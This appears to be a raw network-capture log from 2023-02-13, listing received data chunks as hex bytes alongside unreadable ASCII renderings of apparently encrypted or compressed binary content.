                                                                                                                  2023-02-13 17:58:09 UTC119INData Raw: f0 ba 96 bb 05 22 15 97 ab 4f 29 46 c1 04 4c 81 00 01 7f ee a7 16 55 8b 0d af 3a 72 0d 51 ea 23 50 f2 c0 2d 62 1b b1 12 e8 ab d8 7d 96 e3 55 7f 7d ff 77 34 58 8e bf d5 63 e3 89 01 a9 ff 9c 75 8e 81 dc c5 4e 33 e1 7e 83 2e 18 8e 11 fb ab 65 c7 37 71 98 a8 f5 34 ed 2f 75 2b fa 4d e8 70 e4 f9 48 30 98 6f c4 fe 6c d9 47 4e 20 a3 3c d4 18 55 28 0c 7b e3 3f a2 64 6e d1 3b 5c da 6b 71 6c 98 02 b9 06 e8 e3 bd 8f c6 20 01 ed 84 8f 14 a5 72 53 60 62 16 b4 05 35 70 73 e4 7d 24 5a 3c 35 3f 1c b4 66 cf 3c ab e9 0d a8 18 f3 90 28 74 98 00 c4 34 a0 60 f3 8a ae cf 15 16 54 11 3c ab f1 91 03 fa 9a 67 3b 46 7e 3f 8b 6a 95 46 10 5b 59 26 2d e3 b3 f4 6f ed 1c f5 3a 08 43 b0 b6 c5 1f 91 b0 84 c3 42 14 80 5b 4d ed c8 c3 9c ed 1a 80 b1 88 3d 5f c9 d6 71 bc 4e ff a8 00 b7 74 6a
                                                                                                                  Data Ascii: "O)FLU:rQ#P-b}U}w4XcuN3~.e7q4/u+MpH0olGN <U({?dn;\kql rS`b5ps}$Z<5?f<(t4`T<g;F~?jF[Y&-o:CB[M=_qNtj
                                                                                                                  2023-02-13 17:58:09 UTC121INData Raw: 33 69 c4 a2 85 04 1c 2a 29 96 53 ee fc 78 57 0d a5 e1 c4 2a 74 9b 95 80 5b a8 cb 10 ec 9d dd ef 34 47 83 7f 7b 33 0e 14 ea 12 3f ef 56 7f 19 54 f9 b1 81 12 79 99 d1 d9 73 cd 66 44 7d da 62 36 30 d4 27 2c 6e b5 26 c9 43 b8 57 3c ce 9f 3f 96 8e d6 65 3c 91 6c f8 9c 30 28 b6 3a 42 4d 09 6e a8 5b 74 04 bf d8 11 ba a0 e7 67 bc b1 68 38 e6 af b8 29 14 89 0a 34 ba e5 61 6d 83 2c de 62 ce 60 f4 df 0b a4 ad c9 2f 8e 58 1d ac d2 1b 2f 44 8b 0a 61 6c 63 50 4c 09 94 31 fb 2a 3f 65 2c 86 b5 da c1 fb f1 38 94 c1 55 17 cc 13 ec 8d 60 70 9d 07 c8 6b 6c 18 03 70 e2 63 d6 fd e6 f5 56 83 e9 39 e3 d0 e7 b8 ca 33 32 9a 8c 2b 35 d2 dd 4c 93 ff 58 5b e8 a7 5c 00 1c f7 1f 16 5e 93 ab f0 08 1c f7 dd d5 ed 19 89 c6 56 95 b2 98 cf 41 64 76 ee da 8f 70 38 5b 1a f4 9a cf b9 91 56 2d
                                                                                                                  Data Ascii: 3i*)SxW*t[4G{3?VTysfD}b60',n&CW<?e<l0(:BMn[tgh8)4am,b`/X/DalcPL1*?e,8U`pklpcV932+5LX[\^VAdvp8[V-
                                                                                                                  2023-02-13 17:58:09 UTC122INData Raw: 55 16 ef 29 e8 45 4b 61 31 71 55 38 f6 77 1f 8a 3e 63 19 dd 5f 13 c5 80 ae 17 45 c7 48 5a 2a 4c 0b dc 1f 97 5f e1 a3 53 2b 36 e0 96 0c 3a 23 0d 1b 22 25 81 01 27 aa 07 7d 3e 7b 38 c7 62 b2 9b 82 e2 35 92 c2 9c 96 08 58 a2 11 10 1a b3 0a 05 bf bb 18 31 9c 97 8e ba 2e 68 c1 74 e1 39 a3 84 ff e1 82 d8 2f 01 f3 9b 88 99 34 1f 2b 40 01 30 b0 96 4c 28 c2 c4 f0 2d dc 31 5d d2 a4 47 3b e2 db d0 8f d4 99 c7 92 c7 13 aa 0d d3 9c 5b aa 66 d8 b4 cb a9 4c b3 c6 48 fa d9 dc 41 22 17 71 d5 fd ce 97 19 e4 e9 03 1c b6 ff 8d c2 ce 1f 4c e3 63 85 5c 4c 6c 67 84 37 1f 46 04 f1 00 9d 3a 06 20 a3 d9 a9 bb be c0 69 ab 35 6f 42 54 17 5e d8 0c b4 f1 97 97 9f 95 bc 39 ce 5c 13 07 41 71 78 e3 e9 c3 ff 72 e8 18 ba e2 fd bd 21 79 33 f2 e6 82 17 7f 24 ed ad ab 5b f9 91 12 ef 9e 21 da
                                                                                                                  Data Ascii: U)EKa1qU8w>c_EHZ*L_S+6:#"%'}>{8b5X1.ht9/4+@0L(-1]G;[fLHA"qLc\Llg7F: i5oBT^9\Aqxr!y3$[!
                                                                                                                  2023-02-13 17:58:09 UTC123INData Raw: ce 67 14 5a 3b e4 8c 8d ee f2 fd f0 87 6e de 32 8a ed aa b6 c7 f2 b6 4b 56 9c 78 42 69 41 74 88 3c 89 68 79 e1 e3 d6 fa 29 56 9c fa 82 31 ea 43 fa 4c cf f1 5c 9e d8 bf e2 a3 35 61 db e5 67 98 97 a5 22 61 ff 48 ba ba af 1b e1 79 45 68 f1 58 c8 72 a4 e6 64 ee 7d 19 43 3a cc 98 9b c5 0a 60 42 67 22 98 de fd fa 27 c9 c4 23 9d be db cc ed 78 9c 69 32 13 20 f0 a6 4e 41 4b 5d d2 95 85 0f 5d ac e4 04 4a ed a1 a8 ea ef 4d 13 4e bc 84 a4 60 8e 30 e5 17 b3 f4 40 f8 98 f1 80 23 cd cf 73 a0 bf 22 ae 24 99 d3 a6 ed eb 15 fa 6a 0b f8 18 25 6a 7a 01 1a 9c 21 b9 57 68 fb 5b 86 9f 79 db 99 8c 92 7e ec 48 90 7f 87 e1 97 60 cf a3 44 86 a6 86 19 8b 98 19 3a c8 35 60 27 0d 5f 72 bb 0f 5e 66 91 9d 93 f9 c9 1e 53 9a e3 5a ce 64 e6 a0 bf a0 de 1b f8 a1 52 45 cf c5 a5 23 14 61 e9
                                                                                                                  Data Ascii: gZ;n2KVxBiAt<hy)V1CL\5ag"aHyEhXrd}C:`Bg"'#xi2 NAK]]JMN`0@#s"$j%jz!Wh[y~H`D:5`'_r^fSZdRE#a
                                                                                                                  2023-02-13 17:58:09 UTC124INData Raw: 6d 8d d3 b2 72 35 dc ad 45 c2 4e 9f 62 35 b6 d8 50 fe 9c a5 3f 4d 92 1c 8e 20 6e b4 ca b0 38 2e 9f 4d 80 17 35 53 83 37 0d 09 3b 17 b1 a9 93 96 86 0e f9 a0 30 44 73 95 5c 64 be 30 43 2a 7f e2 04 da f8 53 65 2b 07 fc 77 7d 51 ff 71 c3 18 b4 81 68 a2 db 31 b0 f5 48 9c 3e 37 8a 50 65 5c e2 23 87 98 fa c9 74 b2 76 9b ad 32 8f f2 f6 cf 68 d4 16 fb fe fe 19 7b ab e8 b4 ec 2f ee 35 cc 3e ec ee 6b 23 7f e4 b1 c7 71 80 dd f3 a7 ea 77 72 15 77 0a a7 d8 b7 57 2f 06 b6 26 fd 22 36 c7 09 5d d8 bc fc 0f f1 fe 72 ac 95 64 1c 21 93 ba f5 d2 a0 e6 75 a2 19 f8 f5 c0 94 63 80 8a ad 1f 88 2d d4 d5 82 2a 60 ef 61 ea d3 bd c0 97 cc 5d b5 1e b8 9c 61 4b 31 45 68 63 9e 89 56 5b c1 08 b6 c2 5c 62 d9 81 1e 09 4a c5 f6 71 23 08 2a 97 9f 53 73 bd 43 17 ea 9e ee 7b 34 1e 32 4b b1 fe
                                                                                                                  Data Ascii: mr5ENb5P?M n8.M5S7;0Ds\d0C*Se+w}Qqh1H>7Pe\#tv2h{/5>k#qwrwW/&"6]rd!uc-*`a]aK1EhcV[\bJq#*SsC{42K
                                                                                                                  2023-02-13 17:58:09 UTC125INData Raw: 21 46 23 65 fc 38 de 81 f7 d8 87 f3 e2 5e c8 21 a9 f0 e5 f4 e4 f7 e1 27 eb 9a 44 95 5e 10 a7 e5 9d 4c eb d7 9e 66 e2 96 3f 58 56 1d be ac 7b 09 ec c5 00 c3 46 1c 25 6b bf 2c f7 59 0f 65 45 5a 0b 8f de 85 ee 41 8c 46 93 e3 a7 48 24 17 ac ea ff 9c 62 e2 e2 03 a4 15 2c 70 07 25 57 30 89 af 16 5b 88 5b 5e c3 ae c6 f5 25 5a c8 11 ed b2 64 e4 8b 56 33 8a 51 ba be 31 da f6 d6 c7 a0 e4 28 c7 69 91 23 be 1b 83 e7 ee 62 d6 21 5f 84 8a 11 80 be 05 0c 59 ad 00 3e bb 49 53 a5 1c e2 5d 9e 75 03 c2 80 b5 21 a2 b4 fe cf c2 4c ae 91 d6 82 b7 4d eb ba f8 53 67 58 0d 84 62 60 8c 88 80 57 19 a3 5b 15 58 bd e3 61 72 ff 8e 51 04 c1 d2 4e 83 a3 15 cf 09 54 91 62 86 0d 46 40 6b 25 26 2d 88 46 5b ef 76 1c cc 4d 1f 94 08 9d ac 23 18 8f 9b ea 0d e6 26 03 ab cc 1d 7d 61 92 6d 38 76
                                                                                                                  Data Ascii: !F#e8^!'D^Lf?XV{F%k,YeEZAFH$b,p%W0[[^%ZdV3Q1(i#b!_Y>IS]u!LMSgXb`W[XarQNTbF@k%&-F[vM#&}am8v
                                                                                                                  2023-02-13 17:58:09 UTC127INData Raw: 31 2b e4 79 62 f4 25 2f bf 99 09 d8 08 e4 b8 09 e0 75 19 8e 26 27 cd 18 ca 01 8a 12 9e 16 f5 48 d3 92 74 39 e4 9b 82 f3 3e 4e e3 4f 8d e9 b4 fe b3 3c d9 78 cf cd bc 4a d0 05 2a 8c 5b ed 82 b7 47 50 72 89 bf 3d 66 ae 2e e6 8c d7 f2 15 2d b7 41 70 74 09 ed de 43 e8 b0 6a 8d 4c 31 ec 74 ab cc f0 04 05 6e 64 c5 02 c1 16 23 db 16 d3 84 ce 13 fe f1 db cc df 79 11 4c d7 6a a1 31 31 c6 c6 57 97 2e 94 a1 93 9e ee 90 a2 4d f2 f1 d8 1c d4 b5 04 65 fc 2b 77 5e f4 41 7a 09 95 54 f6 9f ec 60 91 6e 5a bb c2 81 95 e9 4a 29 15 69 22 b9 c6 ef 45 53 6b 1d 0c e5 32 58 7d 71 bb 42 ae 8a 0e 2d 55 32 a8 30 bc be b1 35 d8 9a 43 25 ab 26 3e 3d 73 7f 6d 01 cf 66 57 bd 49 d3 f1 8c 94 34 46 6b 4d 69 2c 24 82 19 8c 7a 9f 65 77 3f 2a 35 0a 81 f7 30 25 a9 db 11 70 87 fa c6 2d e0 02 a1
                                                                                                                  Data Ascii: 1+yb%/u&'Ht9>NO<xJ*[GPr=f.-AptCjL1tnd#yLj11W.Me+w^AzT`nZJ)i"ESk2X}qB-U205C%&>=smfWI4FkMi,$zew?*50%p-
                                                                                                                  2023-02-13 17:58:09 UTC128INData Raw: 0a 19 30 56 09 d1 2b 6d 28 aa 51 c7 e0 c5 93 63 33 57 1f e4 0a 37 5b ca 45 da c5 37 9a 94 ca b4 7b f6 89 f0 17 42 b5 f9 a5 81 bd 1d 9e 03 8c 12 f8 75 ec 83 ec a8 ca 7a 5b fe 21 9f 7f 88 fb 6c 29 d7 99 f9 36 61 f1 6d a8 e4 03 f3 2f d2 65 c9 75 ac d5 1b ae 13 d4 f1 fc c9 c3 dc b9 31 1b a3 3d 3e 87 db bb 1f 67 0c 68 24 bf 71 04 4a 21 4b 79 10 6e 79 fe 3e c9 ee fb ad 17 c5 60 1a 8c 4b cb 84 6b a6 ba 20 89 41 50 70 41 8d 23 69 eb b6 1a 96 da 19 b2 0c 1e 0d e3 00 78 c6 0e 06 fe 6d bc da 72 90 e6 08 a0 f7 88 4f 8e 58 28 34 78 f5 ac 83 ac 9a d8 9e ab 13 4c 02 2d 1a fb 55 77 91 87 2b 02 a5 17 71 de 40 8e 3e 26 2f 81 11 5b 49 42 1d 0f a3 7c 92 c7 f4 7d 91 ca fb 8b 8c e1 2f 69 5e 8a 4e 37 38 a7 38 a9 a6 3d 5c 2f 81 df b6 55 5e 0b df fb d6 ea 0c 45 55 19 41 ab 8f e3
                                                                                                                  Data Ascii: 0V+m(Qc3W7[E7{Buz[!l)6am/eu1=>gh$qJ!Kyny>`Kk APpA#ixmrOX(4xL-Uw+q@>&/[IB|}/i^N788=\/U^EUA
                                                                                                                  2023-02-13 17:58:09 UTC129INData Raw: 24 dc c4 d5 39 6d f9 9e 59 7d 77 ed 99 23 bc 12 7c 93 ec 98 aa c8 77 1d 35 76 f9 29 b9 99 7e 04 b2 6d b4 53 2d b2 8d 58 02 b4 66 9a 6c 85 64 bd f4 5d fb ae e4 4f a0 bd de f5 18 63 60 03 d4 5b 17 16 0f 1e 87 e5 d4 ad 07 53 90 8f 31 7a e1 41 ce 93 0c 0d e7 67 1a 2c 66 db 35 a1 1a 85 5c 5f d8 85 74 0f 41 2b a2 ca 30 07 f9 03
                                                                                                                  Data Ascii: $9mY}w#|w5v)~mS-Xfld]Oc`[S1zAg,f5\_tA+0
                                                                                                                  2023-02-13 17:58:09 UTC129INData Raw: 97 4f b1 ea 2e 1d 03 4d 59 f9 5d 89 67 19 3c 5f ac ec 69 20 8d 5d da ed 8b f6 2d d4 fa 0b 04 da 9d 25 13 63 83 f7 4e af 42 aa a7 01 65 e8 cb ad 65 43 5e 7a b8 f5 a2 19 dc b0 56 e6 40 ca 1b 94 3e f5 31 03 67 26 13 af f7 8a 4d be 4c 0b 7a ff 83 5b b0 99 75 f1 33 fd ae d1 6d 39 2a 82 d2 2f 33 93 e5 39 84 9a 89 8e d4 79 7b 4d 08 68 63 0b c2 77 00 77 3f ed e0 f5 cf d9 a7 d1 de a8 b8 04 37 23 8c 8e c4 36 3c e8 a9 20 9e 2a 72 90 e5 32 eb 58 e5 26 a6 dd df 39 fa af 82 e8 f8 8b 52 0f 83 bc 91 88 b9 32 ec 78 86 91 34 0f 4c 2e 22 a3 6e 32 8e 26 7f 98 5a ff a0 81 aa c4 c8 0b 20 24 e7 a7 e6 c2 2a d2 a9 91 31 86 35 a0 0c 5a 44 b1 c5 9f a9 2a 86 8f 2a fd ef ac 14 14 62 b7 73 44 03 66 27 b0 56 bb 5a 30 6b d7 cb ef 46 76 51 5f 3e 29 4f cc 9c 78 27 75 20 79 3d e2 99 f2 c0
                                                                                                                  Data Ascii: O.MY]g<_i ]-%cNBeeC^zV@>1g&MLz[u3m9*/39y{Mhcww?7#6< *r2X&9R2x4L."n2&Z $*15ZD**bsDf'VZ0kFvQ_>)Ox'u y=
                                                                                                                  2023-02-13 17:58:09 UTC130INData Raw: 7f f5 cd b7 03 2f 09 07 c6 83 b1 b1 e3 74 c3 2a 06 37 a1 2d a3 c3 7a 4f 2e 91 1d 08 46 e9 61 fb b4 10 63 68 00 a7 d5 d9 bb 49 cc d8 9d bf 40 34 e3 04 70 62 15 68 ee 0a 37 f7 8e 21 7e 85 ac 82 96 82 ae 41 48 ec a7 8e dd 6e 82 da 8c 39 85 c1 80 2a cd a7 49 6a 46 8f e1 80 54 b0 09 49 c1 6c 7f 76 89 29 7c de cb dc 40 f7 f3 c1 7c 3e 6c 80 1f e9 89 71 e4 e3 32 77 b3 8c 40 b2 c5 3c ba ac 06 25 44 ae ca ce 99 e9 fa 59 0c 95 25 76 35 fc 3c c9 6a b6 64 23 7e d4 6f 97 f4 b7 c4 6e 1c f1 fc a7 99 3b 54 b0 07 b3 08 e2 2d e2 bb 1a 40 af ed 18 01 77 11 29 d7 3f d6 a9 56 97 f7 8b 79 c4 bb e4 fc b4 bb 82 a9 67 ec 6c 60 c9 5d 7e 9c 27 55 7c c6 35 a2 76 e1 ce 68 49 a5 d7 78 20 0e e4 cc e4 dc ef 93 2e df 51 8c 3d 30 9b dd d9 a3 01 e3 a7 bb e9 78 ca 0a 3b a0 64 c9 26 96 a1 dc
                                                                                                                  Data Ascii: /t*7-zO.FachI@4pbh7!~AHn9*IjFTIlv)|@|>lq2w@<%DY%v5<jd#~on;T-@w)?Vygl`]~'U|5vhIx .Q=0x;d&
                                                                                                                  2023-02-13 17:58:09 UTC132INData Raw: 56 37 67 3f f1 b3 85 9c 2e 9d 33 96 f0 94 04 44 2e f5 bb d8 7a 9d 15 eb e7 cb 2a 40 84 9d c6 d6 14 87 ed 46 63 ee 0e 69 2f 3b cf e5 ae 21 12 fc ca 83 27 ee 45 57 e4 e5 cb 1b 13 78 55 79 aa 7c a6 10 5b db 5b 97 c8 a0 45 5a 22 79 f9 24 76 7d 01 85 d0 cb 0b f0 7c 61 3d 29 0c 5a 6c e2 6d 0e b9 8b 0b 1a d5 cf e5 af 06 06 06 3c 05 0f c2 12 11 78 8b 63 03 77 7e bf 97 bf ac fd 64 cc 03 51 95 c4 d6 0f 90 e5 0b 0d 7e 21 e2 be 64 f6 77 41 62 76 d9 2f 90 55 08 83 06 76 99 74 ae a1 70 25 4b 38 f9 6b 7f 36 3c 08 e6 9e 72 40 27 d0 1d 9c 59 a4 66 49 ee 03 84 70 da 30 a9 b3 88 8c 40 f2 b5 01 75 f6 3a 3c 74 31 df e1 5b 1a a3 09 86 5d b1 de db 09 67 06 2d fd 53 b8 4a c0 5d 86 c7 1e 86 79 56 4d 5a 05 e3 2a e0 28 d5 e1 76 f8 29 4f 42 91 fb fe c3 b2 3a 3f ac 60 5b a7 87 9f 07
                                                                                                                  Data Ascii: V7g?.3D.z*@Fci/;!'EWxUy|[[EZ"y$v}|a=)Zlm<xcw~dQ~!dwAbv/Uvtp%K8k6<r@'YfIp0@u:<t1[]g-SJ]yVMZ*(v)OB:?`[
                                                                                                                  2023-02-13 17:58:09 UTC133INData Raw: 87 5c d7 1b ae d1 77 b1 39 3d 00 ce 61 82 9f dc 20 b5 12 e4 ee ad 01 d7 11 ad 8d eb 5a 1d e5 05 47 ee 20 4d c4 12 18 da 75 11 a7 a9 52 eb 98 2b dc c4 21 cd 1d 48 36 7e 0e d6 d5 e8 53 25 2a d7 36 a6 00 e4 96 5a 1f 86 ef 83 e3 a5 f0 72 7f 30 94 47 39 57 8d 46 d2 a7 fd 03 93 9d 6f c6 35 71 d8 36 08 b0 3d 63 8e 14 6b 0d 85 7b 0a 36 1c 79 b4 27 d5 75 57 f6 4f 23 9f a4 ed 50 a9 24 af 6a bd f4 80 24 f3 ef af ca 48 bb 25 55 74 2e 18 25 09 39 55 7d 0c cd 76 5a 79 5c ce 85 05 31 6a 30 c5 36 33 4b da 39 61 79 3f dd fb 5f e0 45 bc f0 a3 9e f1 bf 4a 10 cb d4 9d b1 11 35 2e 41 78 c4 94 67 92 32 cb d7 7a d6 f1 d6 8b 6b 44 bb fe 41 e1 ff 30 c5 67 3e c0 e8 9c ef 01 78 b2 df 77 96 d7 ac 3d 00 05 99 f0 78 e0 5e 01 ed 70 38 4f 4c 8e d7 92 5d 58 80 5b 80 c0 4a 84 d6 26 e1 02
                                                                                                                  Data Ascii: \w9=a ZG MuR+!H6~S%*6Zr0G9WFo5q6=ck{6y'uWO#P$j$H%Ut.%9U}vZy\1j063K9ay?_EJ5.Axg2zkDA0g>xw=x^p8OL]X[J&
                                                                                                                  2023-02-13 17:58:09 UTC134INData Raw: 6a 64 34 57 64 d2 66 d7 c8 58 97 15 53 c5 aa e7 8a 8a f0 75 ed b9 3d 69 45 bc 57 13 84 36 88 d2 0b 83 ab 8f 49 99 f9 7f 33 71 3c bc 36 05 2a c8 b9 ee 2d 92 02 e2 cc 6c 75 91 3c 03 34 3f bc fd 63 8b 34 b3 f6 7f 9d 7c f2 70 e0 2f 8f 10 fc 27 5b af 25 bc 1d 81 dc 0e 2b 80 2b 36 70 02 2c 87 a7 8d cb d3 64 ec c6 f9 12 d1 9a da ec 9d dc 82 b1 89 33 62 5a ab 13 bc 3a 0a 68 57 15 4e a5 30 2b 71 b0 8f 2f fa 24 48 09 35 2a 3b 32 5e af ed f2 2d e9 1e 7d 5c 91 43 2b f1 df 4f 1a a0 95 4d 00 06 7d 9f 57 14 6d 5a 14 b5 df d1 d9 5a a0 88 8b 68 a8 5d dc b9 ba 38 1a 49 4c ca 5b bd 1f c5 a3 ed b9 f2 50 7d c9 89 36 2c 1c 79 33 1f 03 a5 bd 84 01 7b 1d 7f 45 cd 56 e3 27 e7 38 bb d1 93 db 48 3c 26 ef 09 22 61 45 80 c8 54 0c 85 4a b0 c5 7b ec c4 84 b1 28 5c 07 cb 0c 0b 89 68 5d
                                                                                                                  Data Ascii: jd4WdfXSu=iEW6I3q<6*-lu<4?c4|p/'[%++6p,d3bZ:hWN0+q/$H5*;2^-}\C+OM}WmZZh]8IL[P}6,y3{EV'8H<&"aETJ{(\h]
                                                                                                                  2023-02-13 17:58:09 UTC135INData Raw: bb a5 6b 94 56 8b 66 ac 59 97 c6 57 3d 20 77 64 14 de f7 60 2e 6e 34 95 bf 7e e7 d1 b0 e8 89 90 23 e9 08 cc bb aa ba c8 43 f0 fb 6c aa 2b 9e a4 9a 15 ec 7d 6d 82 73 81 0e ef 33 02 2a 06 c2 e9 61 cc dd ad 89 50 d2 2e 05 bd b5 c9 5d 08 e0 66 2c dd 1e ee 14 4b 67 f8 3d 67 25 c1 66 96 37 ef f1 40 08 0b 78 6a 27 e9 a0 0f 6d f4 33 82 0e 9d c1 8f 63 a7 5b 75 6f fa e0 72 3f 1b 91 70 fe 45 33 02 7e 1d ae eb 9f fb 58 a1 7c c2 2d 95 5f 99 f0 09 42 8b 5f dc a7 b2 26 4b b6 05 a0 a2 00 9b 4c a8 bd 4f 0c c2 da 28 8d 29 65 92 4a 59 d1 41 5a bc 82 14 96 78 9b 07 15 62 2d 1c 16 b3 be 14 99 8c a2 63 79 46 03 1a e9 8e 7b 8e a2 6c 73 45 78 a2 31 25 58 53 4c 52 d7 77 56 95 73 48 11 7a 6b 58 99 ff f5 7f 1f cd d9 95 0a 25 e5 b3 6b 50 69 ba a8 6b 0e 72 d1 9d 52 7d c1 e1 5c 06 04
                                                                                                                  Data Ascii: kVfYW= wd`.n4~#Cl+}ms3*aP.]f,Kg=g%f7@xj'm3c[uor?pE3~X|-_B_&KLO()eJYAZxb-cyF{lsEx1%XSLRwVsHzkX%kPikrR}\
                                                                                                                  2023-02-13 17:58:09 UTC137INData Raw: 3d 1b 9e 25 ec aa cc dd b1 7c 7c a5 a4 e0 d0 69 e9 07 f1 98 e6 00 96 0d e9 d0 b9 91 2b 92 65 c8 5a 56 e7 ba 51 04 2d 9b 8d 47 16 c1 6d 27 97 7a ec cc 1b e2 27 1c 77 8e 02 37 31 c6 49 b5 01 1e 7c ba 8f 8f 85 94 bd a7 27 69 2a 0f 36 4f e6 7e 13 d0 c4 94 5b 63 34 13 38 c1 0a a6 fb de fc 11 85 a2 31 86 01 01 66 32 84 03 e9 af 53 6c e4 77 d1 69 a5 7c 8b 17 75 21 bd 35 0d b6 3d b2 44 ce f9 64 d5 54 b8 99 87 65 75 ac e6 79 f2 65 ba ae 39 2c 1f 5b 2b 1e 8b c9 ba 0b e0 6d 66 28 c7 63 77 7b 04 b2 c3 4e 32 31 3c b9 4e 7c 50 dc 3e f4 31 b8 5f e1 e2 ec 9f fc a7 19 34 1b af 0b d0 9d 71 53 46 66 13 4b c4 fe 28 35 81 de 9d 84 a2 7c dd 65 db a7 59 ad ce 02 93 01 62 8f 3e 94 bd 9c 6e 84 da 8a d2 48 68 9a ed 50 42 01 cf 9b db 2f 1f ca de 05 2a 1c fd 2d 78 51 7b b1 05 67 f2
                                                                                                                  Data Ascii: =%||i+eZVQ-Gm'z'w71I|'i*6O~[c481f2Slwi|u!5=DdTeuye9,[+mf(cw{N21<N|P>1_4qSFfK(5|eYb>nHhPB/*-xQ{g
                                                                                                                  2023-02-13 17:58:09 UTC138INData Raw: d5 3a 6e c9 48 8d e2 95 5f 34 72 5e 70 69 09 6e fc 33 87 d0 1e c7 a1 9b b9 6b d6 6b a4 e6 66 5d e0 c7 84 f5 b0 93 d2 6b c1 da b0 84 f6 46 e2 54 32 18 30 21 4d ba 8c 3c e3 46 93 f1 20 97 05 05 8e 03 f4 29 40 7a a1 ca cb 1e 07 0e e2 c2 ac 0a b4 63 6f 53 99 f4 bd a4 38 9a ad 71 58 13 54 01 3c 1f f2 d7 25 73 53 06 82 27 aa 5d 80 07 3d 58 3e d5 82 05 cf a4 d7 fb 4a a9 ee b7 83 07 44 e8 f4 64 b0 41 1c e9 68 68 bf a2 7b e4 78 37 23 6f b4 c7 8b 30 1e 6e 63 5a ff 34 93 83 5d 67 f2 b8 8c b6 93 7a 71 34 7c 03 ae e5 98 cd f7 52 8a c0 70 cc cd b0 41 20 8e 2d 7b 56 af 99 f0 ed 26 69 35 2f 71 d3 9e b3 88 c6 6c 3f f6 a1 a4 2b 94 9e 7f b8 d6 ce a1 e3 a2 59 e0 a0 38 de 41 71 d6 1a 37 75 25 f6 f5 ed 40 16 95 17 e2 f1 80 5a e7 6f bd d0 f7 21 3d e4 7f 7b 87 4f ea 66 a4 93 d6
                                                                                                                  Data Ascii: :nH_4r^pin3kkf]kFT20!M<F )@zcoS8qXT<%sS']=X>JDdAhh{x7#o0ncZ4]gzq4|RpA -{V&i5/ql?+Y8Aq7u%@Zo!={Of
                                                                                                                  2023-02-13 17:58:09 UTC139INData Raw: 03 d1 8c 04 3b a9 0c b9 b5 84 d6 a2 3c d2 bb 04 18 e3 0b cd ff 69 cd b0 c5 f2 8c a9 d2 b6 7d a0 b6 56 1d 07 e9 e0 3e ef 64 69 14 09 e8 b4 1f 15 33 58 47 75 fa c4 64 74 f2 37 67 c9 0e 93 6f a5 e2 88 0f 8d d8 53 18 1b 2f 41 8b 91 28 93 11 52 a0 d1 7d 7d 73 a6 b4 3f 1c 2d e2 29 e5 b8 c0 96 40 43 13 a9 9b b6 90 48 f0 08 95 94 85 e6 33 94 9c f3 86 b0 64 1a 9d 96 7b ff 25 98 78 5c 3e 26 56 cd 14 90 f5 09 37 8f c0 f8 2c f3 ef 72 c6 36 fb 2d e1 67 99 9b aa c3 c6 3f 30 58 7f e8 42 f5 b4 21 e5 65 62 1d ca ce 5d 77 f3 89 e2 34 7d 7c 22 db 2a 36 1f cb fd 6c c3 fb 72 b1 fd fe 8b 12 20 95 d2 4b 4c 57 6c 70 d7 c6 44 03 48 ac 20 06 37 7d b1 c9 f9 39 bf 35 9f 9a 5e cb 94 5e 94 71 68 7d f2 6a f9 f8 09 a6 50 14 50 ff ca 9a b2 92 77 83 6e e3 f1 47 26 d0 bc c3 a7 76 75 61 d0
                                                                                                                  Data Ascii: ;<i}V>di3XGudt7goS/A(R}}s?-)@CH3d{%x\>&V7,r6-g?0XB!eb]w4}|"*6lr KLWlpDH 7}95^^qh}jPPwnG&vua
                                                                                                                  2023-02-13 17:58:09 UTC140INData Raw: 2e 43 9a 0f 9f 2a ef 4f d3 e1 02 52 d8 fd b8 e9 f9 ed e5 69 fe 7d ff da 2e f2 95 57 d4 03 d4 65 96 95 96 3c 31 db 95 49 6b 0a b1 b2 17 b2 ff ee 49 02 71 83 d8 17 47 4d 5a ba 44 f8 1e 2d ad c2 a3 e3 8d 74 18 8c 8c a7 f0 ff 62 7f 2c 60 37 42 22 86 75 2a 49 d6 f6 6c 06 c9 aa e2 b9 3e 43 e4 ea 61 83 ee 10 fe cb 75 d8 80 cb 68 40 c5 d2 7d ce 82 3a 77 8b df db 0a aa ec 6f ab 80 e4 97 83 ec 7c 43 d7 27 f8 35 cb 66 8a 0f 5c 91 9c f0 57 46 44 af 96 82 43 0e c3 e9 af c1 a1 9c db eb 0e c1 ca 0d 65 18 b9 d7 6c e1 da 80 f2 d1 21 9f 7e 26 87 2e 43 c1 56 e2 d7 71 09 78 37 66 d2 26 f5 f8 43 a4 1f b5 65 84 32 59 33 1c 78 4a 4d bd c3 df 41 c6 9d fe 72 7e 0f b8 f3 14 e7 ea ee 9f e4 28 ab 22 43 e5 21 47 b4 d1 b2 9e 37 9f e0 89 6e 76 4c 55 15 19 06 80 2c 0d 7f a7 0d 42 ad 0a
                                                                                                                  Data Ascii: .C*ORi}.We<1IkIqGMZD-tb,`7B"u*Il>Cauh@}:wo|C'5f\WFDCel!~&.CVqx7f&Ce2Y3xJMAr~("C!G7nvLU,B
                                                                                                                  2023-02-13 17:58:09 UTC141INData Raw: ec 50 44 cd 32 df f2 39 93 e1 a3 f4 f3 59 f4 9f ed 27 d1 14 c6 b8 86 80 fa 2b 40 b4 86 a3 d3 de ef 9d cc 2a e0 80 81 e6 d3 ec 0d 83 e0 c3 7f 06 d9 09 9a 48 f9 be 2e 74 d6 ba 0a 8d 90 b7 63 71 4a 05 a4 40 a0 14 e3 d1 b5 be 0a e7 0d 19 d5 f7 3b ca 95 11 b1 dc ff 5c 6c 35 4c 12 5f ab 6b 2d 23 9e 04 38 b9 a0 7d 4a ba 0b 53 1a ec 9e 6f 99 7e 1a f3 cd 9d ed c2 aa 7b 13 12 d0 b4 e0 c0 a1 46 08 b0 99 f8 f4 00 5e dc ec 0f 41 50 10 1f b5 f4 29 98 5d b6 c0 4e b0 d8 3b 8a 5a 16 11 1d 01 64 dc 1b 60 e3 bb ba 35 47 b9 26 ff 3b 92 9c 4a 85 98 6c fd cc b4 7c e0 fa 40 79 9b fc 2f 86 de 28 75 6c d7 64 66 05 09 b2 27 62 fd ec 1c d1 11 a0 9e 5a 4e 7c 99 2b 77 85 5d 44 54 80 9d e8 32 3e 47 0f 4b be 7e 0b ed e8 33 ee 5b 97 d8 cf 42 b8 be 68 22 c3 0e 4a 77 3e 17 5c 1f f8 4a a6
                                                                                                                  Data Ascii: PD29Y'+@*H.tcqJ@;\l5L_k-#8}JSo~{F^AP)]N;Zd`5G&;Jl|@y/(uldf'bZN|+w]DT2>GK~3[Bh"Jw>\J
